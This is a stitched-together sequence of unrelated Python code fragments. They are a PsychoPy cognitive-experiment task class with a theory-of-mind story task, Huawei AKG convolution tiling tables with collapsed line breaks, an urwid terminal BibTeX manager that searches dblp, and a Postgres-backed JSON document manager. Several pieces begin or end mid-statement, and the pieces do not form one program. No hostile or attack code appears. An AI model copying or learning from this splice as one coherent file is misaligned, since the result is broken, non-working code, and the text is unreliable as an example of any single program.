                                                                    trial_index = self.trial,
                                                                    start_time = self.t0,
                                                                    start_time_rt = self.t2)

    def run(self):
        """Runs the action observation trial loop and returns the response dataframe."""
        # loop over trials
        self.all_trial_response = []  # pre-allocate
        for self.trial in self.target_file.index:
            # get trial info and stims
            self._get_trial_info()
            # get current time (self.t0)
            self.t0 = self.get_current_trial_time()
            # show the fixation for the duration of iti
            self.show_fixation(self.t0, self.start_time - self.t0)
            # collect real_start_time for each block (self.real_start_time)
            self.get_real_start_time(self.t0)
            # flush any keys in buffer
            event.clearEvents()
            # Start timer before display (get self.t2)
            self.get_time_before_disp()
            # display stims and get trial response
            self._show_stim()
            # show feedback or fixation cross
            if self.target_file['display_trial_feedback'][self.trial] and self.response_made:
                self.display_trial_feedback(correct_response = self.correct_response)
            else:
                self.screen.fixation_cross()
            # update response
            self.update_trial_response()
            # 5 show fixation for the duration of the iti
            ## 5.1 get current time
            t_start_iti = self.get_current_trial_time()
            self.show_fixation(t_start_iti, self.iti_dur)
            # 6.
            self.screen_quit()
        # get the response dataframe
        rDf = self.get_task_response(all_trial_response=self.all_trial_response)
        return rDf


class TheoryOfMind(Task):
    """Story reading task: a story is shown, then a true/false question about it is answered."""

    # @property
    # def instruction_text(self):
    #     return "Theory of Mind Task\n\nYou will read a story and decide if the answer to the question is True or False.\n\nIf the answer is True, press 3\n\nIf the answers is False, press 4\n\nAnswer as quickly and as accurately as possible"

    def __init__(self, screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save = True):
        super(TheoryOfMind, self).__init__(screen, target_file, run_end, task_name, study_name,
                                           target_num, ttl_flag, save_response = save)
        self.feedback_type = 'acc'  # reaction
        self.name = 'theory_of_mind'

    def _get_trial_info(self):
        super().get_trial_info(self.trial)
        # get stim (i.e. story)
        self.story = self.target_file['story'][self.trial]
        self.story_dur = self.target_file['story_dur'][self.trial]
        self.question = self.target_file['question'][self.trial]
        self.question_dur = self.target_file['question_dur'][self.trial]

    def _get_stims(self):
        # get stim (i.e. story)
        self.story = self.target_file['story'][self.trial]
        self.story_dur = self.target_file['story_dur'][self.trial]
        self.question = self.target_file['question'][self.trial]
        self.question_dur = self.target_file['question_dur'][self.trial]
        self.iti_dur = self.target_file['iti_dur'][self.trial]
        self.trial_dur = self.target_file['trial_dur'][self.trial]
        self.start_time = self.target_file['start_time'][self.trial]

    def _show_story(self):
        # display story for fixed time
        self.story_start = self.get_current_trial_time()
        stim = visual.TextStim(self.window, text=self.story, alignHoriz='center', wrapWidth=20,
                               pos=(0.0,0.0), color=(-1,-1,-1), units='deg')
        stim.text = stim.text  # per PsychoPy documentation, this should reduce timing delays in displaying text
        stim.draw()
        self.window.flip()
        # the story will remain on the screen for a certain amount of time (self.story_dur)
        if self.ttl_flag:  # wait for ttl pulse
            while ttl.clock.getTime()-self.story_start <= self.story_dur:
                ttl.check()
        else:  # do not wait for ttl pulse
            while self.clock.getTime()-self.story_start <= self.story_dur:
                pass

    def _show_stim(self):
        # display question for fixed time
        stim = visual.TextStim(self.window, text=self.question, pos=(0.0,0.0), color=(-1,-1,-1), units='deg')
        stim.text = stim.text  # per PsychoPy documentation, this should reduce timing delays in displaying text
        stim.draw()
        self.window.flip()

    def _show_stims_all(self):
        # show story
        self._show_story()
<reponame>KnowingNothing/akg-test #!/usr/bin/env python3 # coding: utf-8 # Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """operator dsl function: conv_backprop_filter""" import akg.tvm import akg import akg.lang.cce from akg import dim from akg.utils import validation_check as vc_util from akg.utils import kernel_exec as utils conv_backprop_filter_tiling_args = { str(((6, 14, 14), (16, 6, 5, 5), (0, 0, 0, 0), (1, 1), (1, 1))): [16, 5, 5, 16, 1, 14, 14, 65536, 16, 65536], str(((1024, 14, 14), (2048, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [64, 1, 1, 64, 1, 14, 14, 16, 64, 16], str(((1024, 14, 14), (256, 1024, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 64, 1, 14, 14, 16, 16, 16], str(((1024, 14, 14), (512, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [128, 1, 1, 128, 1, 14, 14, 49, 32, 512], str(((128, 28, 28), (128, 128, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [128, 3, 3, 128, 1, 28, 28, 32, 112, 128], str(((128, 28, 28), (512, 128, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 256, 1, 28, 28, 128, 112, 32], str(((2048, 7, 7), (512, 2048, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [7, 1, 1, 512, 1, 7, 7, 49, 32, 512], str(((256, 14, 14), (1024, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [128, 1, 1, 256, 1, 14, 14, 128, 16, 128], str(((256, 14, 14), (256, 256, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [128, 3, 3, 128, 1, 14, 14, 128, 16, 128], str(((256, 56, 56), (128, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [128, 1, 1, 
128, 1, 56, 56, 128, 112, 128], str(((256, 56, 56), (64, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [16, 1, 1, 64, 1, 56, 56, 280, 16, 64], str(((3, 224, 224), (64, 3, 7, 7), (3, 3, 3, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 117, 224, 65536, 32, 65536], str(((16, 224, 224), (64, 16, 7, 7), (3, 3, 3, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 117, 224, 65536, 32, 65536], str(((512, 28, 28), (128, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [14, 1, 1, 128, 1, 28, 28, 448, 16, 64], str(((512, 28, 28), (256, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [128, 1, 1, 256, 1, 28, 28, 128, 16, 128], str(((512, 7, 7), (2048, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [7, 1, 1, 128, 1, 7, 7, 49, 256, 128], str(((512, 7, 7), (512, 512, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [256, 3, 3, 256, 1, 7, 7, 128, 16, 64], str(((64, 56, 56), (256, 64, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [128, 1, 1, 64, 1, 56, 56, 64, 16, 128], str(((64, 56, 56), (64, 64, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 64, 1, 56, 56, 64, 16, 64], str(((64, 56, 56), (64, 64, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [64, 3, 3, 64, 1, 56, 56, 64, 16, 64], str(((256, 56, 56), (512, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [64, 1, 1, 128, 1, 56, 56, 128, 16, 128], str(((512, 28, 28), (1024, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [256, 1, 1, 512, 1, 28, 28, 256, 16, 128], } batch_conv_backprop_filter_tiling_args = { str(((32, 1024, 14, 14), (2048, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 288, 1, 13, 13, 288, 80, 16], str(((32, 1024, 14, 14), (256, 1024, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 256, 1, 14, 14, 256, 96, 32], str(((32, 1024, 14, 14), (512, 1024, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 512, 1, 10, 14, 512, 16, 32], str(((32, 1024, 14, 14), (512, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [32, 1, 1, 416, 1, 13, 13, 416, 64, 32], str(((32, 128, 28, 28), (128, 128, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [16, 3, 3, 32, 1, 30, 30, 32, 64, 144], str(((32, 
128, 28, 28), (512, 128, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 32, 1, 28, 28, 32, 304, 64], str(((32, 128, 56, 56), (128, 128, 3, 3), (0, 1, 0, 1), (2, 2), (1, 1))): [16, 3, 3, 32, 1, 19, 57, 32, 64, 144], str(((32, 16, 224, 224), (64, 16, 7, 7), (2, 3, 2, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 25, 229, 16, 16, 784], str(((32, 2048, 7, 7), (512, 2048, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 416, 1, 7, 7, 416, 32, 64], str(((32, 256, 14, 14), (1024, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [256, 1, 1, 32, 1, 14, 14, 32, 32, 256], str(((32, 256, 14, 14), (256, 256, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [16, 3, 3, 128, 1, 16, 16, 128, 48, 144], str(((32, 256, 28, 28), (256, 256, 3, 3), (0, 1, 0, 1), (2, 2), (1, 1))): [16, 3, 3, 64, 1, 21, 29, 64, 176, 144], str(((32, 256, 56, 56), (128, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 32, 1, 20, 56, 32, 256, 32], str(((32, 256, 56, 56), (128, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 64, 1, 55, 55, 64, 96, 16], str(((32, 256, 56, 56), (512, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [32, 1, 1, 64, 1, 55, 55, 64, 80, 32], str(((32, 256, 56, 56), (64, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 16, 1, 56, 56, 16, 1008, 32], str(((32, 3, 224, 224), (64, 3, 7, 7), (2, 3, 2, 3), (2, 2), (1, 1))): [16, 1, 7, 16, 1, 23, 229, 16, 272, 112], str(((32, 3, 224, 224), (64, 3, 7, 7), (3, 3, 3, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 56, 224, 448, 32, 64], str(((32, 3, 227, 227), (96, 3, 11, 11), (0, 0, 0, 0), (4, 4), (1, 1))): [16, 11, 11, 16, 1, 11, 227, 16, 16, 1936], str(((32, 512, 14, 14), (512, 512, 3, 3), (0, 1, 0, 1), (2, 2), (1, 1))): [16, 3, 3, 256, 1, 15, 15, 256, 128, 144], str(((32, 512, 28, 28), (1024, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 1024, 1, 19, 27, 1024, 16, 16], str(((32, 512, 28, 28), (128, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 32, 1, 22, 28, 32, 240, 64], str(((32, 512, 28, 28), (256, 512, 1, 1), (0, 0, 0, 0), (1, 
1), (1, 1))): [128, 1, 1, 32, 1, 28, 28, 32, 256, 128], str(((32, 512, 28, 28), (256, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 256, 1,
self.searching_done.clear() def Redraw(self): with self.redraw_lock: try: os.write(self._redraw_fd, b"?") except: logging.error(traceback.format_exc()) def _FdWriteHandler(self, data): self.event_loop.draw_screen() class BibtexRepo(BibRepo): def __init__(self, glob_expr, event_loop, enabled): super().__init__(glob_expr, event_loop, enabled) self._bib_files = [] self._bib_entries = [] @property def bib_entries(self): self.loading_done.wait() return self._bib_entries @property def bib_files(self): self.loading_done.wait() return self._bib_files def LoadingThreadMain(self): glob_expr = self.source logging.debug(f"Collecting entries from glob expression '{glob_expr}'") self._bib_files = glob.glob(glob_expr, recursive=True) if not self._bib_files: logging.warning(f"Glob expr '{glob_expr}' matches no target") if self.message_bar is not None: self.message_bar.Post(f"Glob expr '{glob_expr}' matches no target.", 'warning') return 'no file' for path in self._bib_files: try: bib_data = pybtex.database.parse_file(path) except Exception as e: logging.error(f"Exception raised when parsing file {path}: {e}") continue for key, entry in iter(bib_data.entries.items()): self._bib_entries.append(BibtexEntry(key, entry, self, path)) logging.debug(f"Parsed {len(bib_data.entries)} entries from file {path}") return 'ready' def SearchingThreadMain(self, search_text): stripped = search_text.strip() if not stripped: return keywords = search_text.split() for entry in self.bib_entries: if entry.Match(keywords): yield entry class OutputBibtexRepo(BibtexRepo): def __init__(self, glob_expr, event_loop, enabled): super().__init__(glob_expr, event_loop, enabled) self.selected_keys_panel = None if len(self.bib_files) > 1: raise ValueError(f"Glob expr '{glob_expr}' matches more than one file") self.access_type = 'rw' self.output_file = self.bib_files[0] if self.bib_files else glob_expr def Write(self): if self.selected_keys_panel is None: return self.loading_done.wait() entries = {e.bibkey: 
e.pyb_entry for e in self.bib_entries} entries.update({e.bibkey: e.pyb_entry for e in self.selected_keys_panel.entries.values()}) for key, entry in entries.items(): if entry is None: logging.error(f"Key {key} has empty entry. Not writing to file.") return pybtex.database.BibliographyData(entries).to_file(self.output_file) logging.info(f"Wrote to file '{self.output_file}'") class DblpRepo(BibRepo): def __init__(self, event_loop, enabled): super().__init__("https://dblp.org", event_loop, enabled) def LoadingThreadMain(self): return 'ready' def SearchingThreadMain(self, search_text): stripped = search_text.strip() if not stripped: return url = f"https://dblp.org/search/publ/api?q={urllib.parse.quote(search_text)}&format=json" with urllib.request.urlopen(url) as response: bib_data = json.load(response) if 'hit' not in bib_data['result']['hits']: return [] for entry in bib_data['result']['hits']['hit']: yield DblpEntry(entry, self) class Banner(urwid.AttrMap): def __init__(self): super().__init__(urwid.SolidFill(), None) self.big_text = urwid.BigText([('banner_hi', "bib"), ('banner_lo', "rarian")], urwid.font.HalfBlock7x7Font()) self.big_text_clipped = urwid.Padding(self.big_text, 'center', width='clip') self.subtitle = urwid.Text(('banner_hi', "A BibTeX Management Tool Powered By D.B.L.P"), align='center') self.version = urwid.Text(('banner_lo', "version 1.0"), align='center') self.original_widget = urwid.Filler( urwid.Pile([self.big_text_clipped, self.subtitle, self.version]), 'middle') class SearchResultsPanel(urwid.AttrMap): def __init__(self): super().__init__(urwid.SolidFill(), None) self._serial = 0 self._serial_lock = threading.Lock() self.banner = Banner() self._Clear() @property def serial(self): return self._serial @serial.setter def serial(self, value): with self._serial_lock: self._serial = value self._Clear() def _Clear(self): self.items = [] self.SyncDisplay() def Add(self, entry, serial): with self._serial_lock: if self._serial == serial: 
self.items.append(entry.search_panel_widget) self.SyncDisplay() def SyncDisplay(self): enabled_items = [item for item in self.items if item.entry.repo.enabled] if enabled_items: self.list_walker = urwid.SimpleListWalker(enabled_items) self.original_widget = urwid.ListBox(self.list_walker) else: self.original_widget = self.banner def keypress(self, size, key): if key in ('ctrl n', 'j'): self.original_widget._keypress_down(size) elif key in ('ctrl p', 'k'): self.original_widget._keypress_up(size) else: self.original_widget.keypress(size, key) class SelectedKeysPanel(urwid.Pile): def __init__(self, keys_output): super().__init__([]) self.entries = {} self.keys_output = keys_output self.SyncDisplay() def Toggle(self, entry): key = entry.unique_key if key in self.entries: del self.entries[key] entry.mark = None else: self.entries[key] = entry entry.mark = 'selected' self.SyncDisplay() def Add(self, entry): self.entries[entry.unique_key] = entry self.SyncDisplay() def SyncDisplay(self): new_contents = [(ent.unique_key_item, ('pack', None)) for ent in self.entries.values()] if not new_contents: new_contents = [(urwid.Text(('selected_hint', "Hit <SPACE> on highlighted item to select.")), ('pack', None))] self.contents = new_contents def Write(self): if self.keys_output is None: return with open(self.keys_output, 'w') as f: print(','.join(map(lambda e: e.bibkey, self.entries.values())), file=f, end='') logging.info(f"Wrote selected keys to file '{self.keys_output}'") class SearchBar(urwid.AttrMap): def __init__(self): super().__init__(urwid.SolidFill(), 'search_content') self._search = urwid.Edit(('search_label', "Search: ")) self.original_widget = self._search self.search_results_panel = None self._search_serial = 0 self.bib_repos = [] urwid.connect_signal(self._search, 'change', self.TextChangeHandler) def TextChangeHandler(self, edit, text): if self.search_results_panel is None: return self.search_results_panel.serial = self._search_serial for repo in self.bib_repos: 
repo.Search(text, self._search_serial) self._search_serial += 1 class MessageBar(urwid.AttrMap): def __init__(self, loop): super().__init__(urwid.Text("Welcome to bibrarian."), 'msg_normal') self.event_loop = loop self._redraw_fd = loop.watch_pipe(self._FdWriteHandler) self.initial_delay = 1 self.post_delay = 3 self.tips_delay = 5 self.next_message_ready = threading.Event() self.next_message_scheduled = 0 self.messages = [ "Use ctrl+c to exit the program with all files untouched.", "Use ctrl+w to write the selected entries to the target file.", "Press @ (shift+2) open the entry using system browser.", "Use up (or ctrl+p or k) and down (or ctrl+n or j) to navigate the search results.", "Use alt+shift+n to toggle enabled/disabled the n-th bib repo.", "This software is powered by Python 3, dblp API, Pybtex, and urwid.", ] self.msg_lock = threading.Lock() self.periodic_trigger_thread = threading.Thread( name=f"msg-trigger", target=self._PeriodicTrigger, daemon=True) self.message_update_thread = threading.Thread( name=f"msg-update", target=self._UpdateMessage, daemon=True) self.periodic_trigger_thread.start() self.message_update_thread.start() def Post(self, message, severity='normal', delay=None): if severity == 'normal': label = "Message" style = 'msg_normal' elif severity == 'warning': label = "Warning" style = 'msg_warning' elif severity == 'error': label = "Error" style = 'msg_error' else: raise ValueError(f"Invalid severity: {severity}") with self.msg_lock: self.original_widget = urwid.Text((style, f"{label}: {message}")) self.next_message_ready.set() if delay is None: delay = self.post_delay self.next_message_scheduled = time.time() + delay def _FdWriteHandler(self, data): self.event_loop.draw_screen() def _PeriodicTrigger(self): time.sleep(self.initial_delay) while True: for message in self.messages: while True: if time.time() >= self.next_message_scheduled: with self.msg_lock: self.original_widget = urwid.Text(('msg_tips', f"Tip: {message}")) 
self.next_message_ready.set() self.next_message_scheduled = time.time() + self.tips_delay time.sleep(self.tips_delay) break else: time.sleep(1) continue def _UpdateMessage(self): while True: self.next_message_ready.wait() self.next_message_ready.clear() os.write(self._redraw_fd, b"?") def __del__(self): os.close(self._redraw_fd) class DetailsPanel(urwid.AttrMap): def __init__(self): super().__init__(urwid.Filler(urwid.Text( ('details_hint', 'Hit <i> on highlighted item to update info.')), 'top'), None) class InputFilter: def __init__(self): self.widget = None def __call__(self, keys, raw): if not keys: return keys if keys[0] == 'ctrl w': try: for repo in self.widget.output_repos: repo.Write() except: logging.error(traceback.format_exc()) try: self.widget.selected_keys_panel.Write() except: logging.error(traceback.format_exc()) raise urwid.ExitMainLoop() elif self.MaskDatabases(keys[0]): self.widget.search_results_panel.SyncDisplay() return return keys def MaskDatabases(self, key): symbol_number_map = {s: n for s, n in zip(")!@#$%^&*(", range(10))} if 'meta ' in key: symbol = key[5:] if symbol == '~': for repo in self.widget.bib_repos: repo.enabled = True else: number = symbol_number_map.get(symbol) if number == 0: for repo in self.widget.bib_repos: repo.enabled = False else: try: repo = self.widget.bib_repos[number - 1] repo.enabled = not repo.enabled except: pass return True elif key == 'enter': self.widget.focus_position = 1 - self.widget.focus_position else: return False class DatabaseStatusPanel(urwid.Pile): def __init__(self, databases, config_source): super().__init__([]) self.contents = [(db, ('pack', None)) for db in databases] \ + [(urwid.Text(('cfg_src', f"config: {config_source}")), ('pack', None))] class TopWidget(urwid.Pile): def __init__(self, args, config, event_loop): super().__init__([urwid.SolidFill()]) self.message_bar = MessageBar(event_loop) self.search_results_panel = SearchResultsPanel() self.details_panel = DetailsPanel() 
self.selected_keys_panel = SelectedKeysPanel(args.keys_output) self.output_repos = [BibRepo.Create(cfg, 'rw', event_loop) for cfg in config['rw_repos']] self.bib_repos = [BibRepo.Create(cfg, 'ro', event_loop) for cfg in config['ro_repos']] + self.output_repos for repo, i in zip(self.bib_repos, itertools.count(1)): repo.short_label = f"{i}" repo.message_bar = self.message_bar repo.search_results_panel = self.search_results_panel repo.selected_keys_panel = self.selected_keys_panel repo.details_panel = self.details_panel self.search_bar = SearchBar() self.search_bar.bib_repos = self.bib_repos self.search_bar.search_results_panel = self.search_results_panel self.db_status_panel = DatabaseStatusPanel( [repo.status_indicator_widget for repo in self.bib_repos], config.source) for repo in self.output_repos: repo.selected_keys_panel = self.selected_keys_panel self.right_panel = urwid.Pile([ ('pack', urwid.LineBox(self.db_status_panel, title="Database Info")), ('weight', 5, urwid.LineBox(self.details_panel, title="Detailed Info")), ('pack', urwid.LineBox(self.selected_keys_panel, title="Selected Entries"))]) self.main_widget = urwid.Columns([ ('weight', 2, urwid.LineBox(self.search_results_panel, title="Search Results")), ('weight', 1, self.right_panel)]) self.contents = [(self.search_bar, ('pack', None)), (self.main_widget, ('weight', 1)), (self.message_bar, ('pack', None))] class DefaultConfig(dict): def __init__(self): self['ro_repos'] = [ { 'remote': "dblp.org", 'enabled': True }, { 'glob': "/path/to/lots/of/**/*.bib", 'enabled': True }, { 'glob': "/path/to/sample.bib", 'enabled': False }, { 'glob': "/path/to/another/sample.bib" } ] self['rw_repos'] = [ { 'glob': "reference.bib", 'enabled': True } ] def Write(self, file): with open(file, 'w') as f: json.dump(self, f, indent=4) class Config(dict): def __init__(self, file_name): prefix = os.getcwd() self.source = None while True: path = os.path.join(prefix, file_name) if os.path.isfile(path) and os.access(path, os.R_OK): 
with open(path) as f: self.update(json.load(f)) self.source = path break if prefix == '/': break prefix = os.path.dirname(prefix) if self.source is None: print("Did not find any config file.") print("You can generate an example config file using option -g.") print("For more information, please use option -h for help.") sys.exit(1) self._NormalizePaths() def _NormalizePaths(self): config_dir = os.path.dirname(os.path.realpath(self.source)) for repo_group in (self[k] for k in ('ro_repos', 'rw_repos')): for repo_config in repo_group: if 'glob' in repo_config: repo_config['glob'] = os.path.expandvars(os.path.expanduser(repo_config['glob'])) if not os.path.isabs(repo_config['glob']): repo_config['glob'] = os.path.join(config_dir, repo_config['glob']) class ArgParser(argparse.ArgumentParser): def __init__(self): super().__init__(prog="bibrarian") self.add_argument("-f", "--config", help="force configuration file path", default=".bibrarian_config.json", action='store' ) self.add_argument("-g", "--gen-config", help="generate a configuration file", default=False, action='store_true') self.add_argument("-l", "--log", help="force log file path", default=f"/tmp/{getpass.getuser()}_babrarian.log", action='store') self.add_argument("-k", "--keys-output", help="output bib keys file (truncate mode)", action='store') self.add_argument("-v", "--version", action='version', version="%(prog)s 1.0") class Palette(list): def __init__(self): self.append(('search_label', 'yellow', 'dark magenta')) self.append(('search_content', 'white', 'dark magenta')) self.append(('search_hint', 'light cyan', 'dark magenta')) self.append(('msg_tips', 'white', 'dark gray')) self.append(('msg_normal', 'light green', 'dark gray')) self.append(('msg_warning', 'yellow', 'dark gray')) self.append(('msg_error', 'light red', 'dark gray')) self.append(('details_hint', 'dark green', 'default')) self.append(('db_label', 'default', 'default')) self.append(('db_enabled', 'light cyan', 'default')) 
self.append(('db_status_ready', 'light
import datetime
import json
from typing import Dict, List, Optional

import json_merge_patch
from loguru import logger
from sqlalchemy import Column, DateTime, MetaData, Table, func, text
from sqlalchemy.dialects import postgresql
from sqlalchemy.engine import Row
from sqlalchemy.exc import (
    IntegrityError,
    NoResultFound,
    OperationalError,
    ProgrammingError,
)
from sqlalchemy.future import Engine, create_engine

from contaxy.operations import JsonDocumentOperations
from contaxy.schema.exceptions import (
    ClientValueError,
    ResourceAlreadyExistsError,
    ResourceNotFoundError,
    ServerBaseError,
)
from contaxy.schema.json_db import JsonDocument
from contaxy.utils.postgres_utils import create_schema
from contaxy.utils.state_utils import GlobalState, RequestState


class PostgresJsonDocumentManager(JsonDocumentOperations):
    """Postgres-backed implementation of the JSON document operations.

    Mapping convention used throughout: a project maps to a Postgres schema,
    a collection maps to a table inside that schema, and a document is a row
    keyed by a varchar primary key with a JSONB payload.
    """

    def __init__(
        self,
        global_state: GlobalState,
        request_state: RequestState,
    ):
        """Initializes the Postgres Json Document Manager.

        Args:
            global_state: The global state of the app instance.
            request_state: The state for the current request.
        """
        self.global_state = global_state
        self.request_state = request_state
        # NOTE(review): _create_db_engine and _get_schema_name are referenced
        # below but defined outside this excerpt — presumably elsewhere in
        # this class; verify.
        self._engine = self._create_db_engine()
        self._metadata = MetaData()

    def create_json_document(
        self,
        project_id: str,
        collection_id: str,
        key: str,
        json_document: str,
        upsert: bool = True,
    ) -> JsonDocument:
        """Creates a json document for a given key.

        An upsert strategy is used, i.e. if a document already exists for the
        given key it will be overwritten (unless `upsert` is False).

        The project is equivalent to the DB schema and the collection to a DB
        table inside the respective DB schema. Schema as well as table will be
        lazily created.

        Args:
            project_id (str): Project Id, i.e. DB schema.
            collection_id (str): Json document collection Id, i.e. DB table.
            key (str): Json Document Id, i.e. DB row key.
            json_document (str): The actual Json document (serialized JSON).
            upsert (bool): Indicates, whether upsert strategy is used.

        Raises:
            ClientValueError: If the given json_document does not contain valid json.
            ResourceAlreadyExistsError: If a document already exists for the given
                key and `upsert` is False.

        Returns:
            JsonDocument: The created Json document.
        """
        # Validate the payload before touching the database.
        try:
            json_dict = json.loads(json_document)
        except json.decoder.JSONDecodeError:
            raise ClientValueError("Invalid Json provided")
        table = self._get_collection_table(project_id, collection_id)
        insert_data = {"key": key, "json_value": json_dict}
        # created_at is stamped on insert; updated_at is stamped on the
        # conflict (upsert) path only.
        insert_data = self._add_metadata_for_insert(insert_data)
        upsert_data = self._add_metadata_for_update(insert_data)
        stmt = postgresql.insert(table).values(**insert_data)
        if upsert:
            # Postgres ON CONFLICT DO UPDATE keyed on the primary key column.
            stmt = stmt.on_conflict_do_update(index_elements=["key"], set_=upsert_data)
        with self._engine.begin() as conn:
            try:
                result = conn.execute(stmt)
                if result.rowcount == 0:
                    # NOTE(review): message reads oddly — a word such as
                    # "failed" appears to be missing before "for an unknown
                    # reason".
                    raise ServerBaseError(
                        f"Json Document creation for key {key} for an unknown reason"
                    )
                # NOTE(review): engine.begin() already commits on context
                # exit; this explicit commit looks redundant — verify against
                # the SQLAlchemy version in use.
                conn.commit()
            except IntegrityError:
                # Unique-key violation: reachable when upsert is False.
                raise ResourceAlreadyExistsError(
                    f"A Json document for key {key} already exists."
                )
        # Re-read the row so the returned model carries DB-side metadata.
        return self.get_json_document(project_id, collection_id, key)

    def get_json_document(
        self, project_id: str, collection_id: str, key: str
    ) -> JsonDocument:
        """Get a Json document by key.

        The project is equivalent to the DB schema and the collection to a DB
        table inside the respective DB schema. Schema as well as table will be
        lazily created.

        Args:
            project_id (str): Project Id, i.e. DB schema.
            collection_id (str): Json document collection Id, i.e. DB table.
            key (str): Json Document Id, i.e. DB row key.

        Raises:
            ResourceNotFoundError: If no JSON document is found with the given `key`.

        Returns:
            JsonDocument: The requested Json document.
        """
        table = self._get_collection_table(project_id, collection_id)
        select_statement = table.select().where(table.c.key == key)
        with self._engine.begin() as conn:
            result = conn.execute(select_statement)
            try:
                # one() raises NoResultFound for zero rows (and would raise
                # MultipleResultsFound for >1, impossible here via the PK).
                row = result.one()
            except NoResultFound:
                raise ResourceNotFoundError(f"No document with key {key} found")
        return self._map_db_row_to_document_model(row)

    def update_json_document(
        self,
        project_id: str,
        collection_id: str,
        key: str,
        json_document: str,
    ) -> JsonDocument:
        """Updates a Json document via Json Merge Patch strategy.

        The project is equivalent to the DB schema and the collection to a DB
        table inside the respective DB schema. Schema as well as table will be
        lazily created.

        Args:
            project_id (str): Project Id, i.e. DB schema.
            collection_id (str): Json document collection Id, i.e. DB table.
            key (str): Json Document Id, i.e. DB row key.
            json_document (str): The merge patch to apply (serialized JSON).

        Raises:
            ResourceNotFoundError: If no JSON document is found with the given `key`.
            ServerBaseError: Document not updated for an unknown reason.

        Returns:
            JsonDocument: The updated document.
        """
        table = self._get_collection_table(project_id, collection_id)
        update_data = self._add_metadata_for_update({})
        # SELECT ... FOR UPDATE row-locks the document for the duration of the
        # transaction so the read-merge-write below is race-free.
        select_statement = table.select().with_for_update().where(table.c.key == key)
        with self._engine.begin() as conn:
            result = conn.execute(select_statement)
            if result.rowcount == 0:
                raise ResourceNotFoundError(
                    f"Update failed - No document with key {key} found"
                )
            row = result.one()
            # NOTE(review): row["json_value"] uses legacy string indexing on
            # Row; _map_db_row_to_document_model uses row._mapping instead.
            # The legacy form is removed in SQLAlchemy 2.0 — verify version.
            update_data["json_value"] = json_merge_patch.merge(
                row["json_value"], json.loads(json_document)
            )  # The json_value needs to be a dict otherwise the string gets escaped
            update_statement = (
                table.update().where(table.c.key == key).values(**update_data)
            )
            result = conn.execute(update_statement)
            # NOTE(review): likely redundant; engine.begin() commits on exit.
            conn.commit()
        return self.get_json_document(project_id, collection_id, key)

    def delete_json_document(
        self, project_id: str, collection_id: str, key: str
    ) -> None:
        """Delete a Json document by key.

        The project is equivalent to the DB schema and the collection to a DB
        table inside the respective DB schema. Schema as well as table will be
        lazily created.

        Args:
            project_id (str): Project Id, i.e. DB schema.
            collection_id (str): Json document collection Id, i.e. DB table.
            key (str): Json Document Id, i.e. DB row key.

        Raises:
            ResourceNotFoundError: If no JSON document is found with the given `key`.
            ServerBaseError: Document not deleted for an unknown reason.
        """
        table = self._get_collection_table(project_id, collection_id)
        delete_statement = table.delete().where(table.c.key == key)
        with self._engine.begin() as conn:
            result = conn.execute(delete_statement)
            if result.rowcount == 0:
                # Distinguish "does not exist" from "delete silently failed":
                # This will raise a ResourceNotFoundError if doc not exists
                self.get_json_document(project_id, collection_id, key)
                raise ServerBaseError(
                    f"Document {key} could not be deleted (project_id: {project_id}, collection_id {collection_id})"
                )
            conn.commit()

    def delete_documents(
        self, project_id: str, collection_id: str, keys: List[str]
    ) -> int:
        """Delete Json documents by key.

        The project is equivalent to the DB schema and the collection to a DB
        table inside the respective DB schema. Schema as well as table will be
        lazily created.

        Args:
            project_id (str): Project Id, i.e. DB schema.
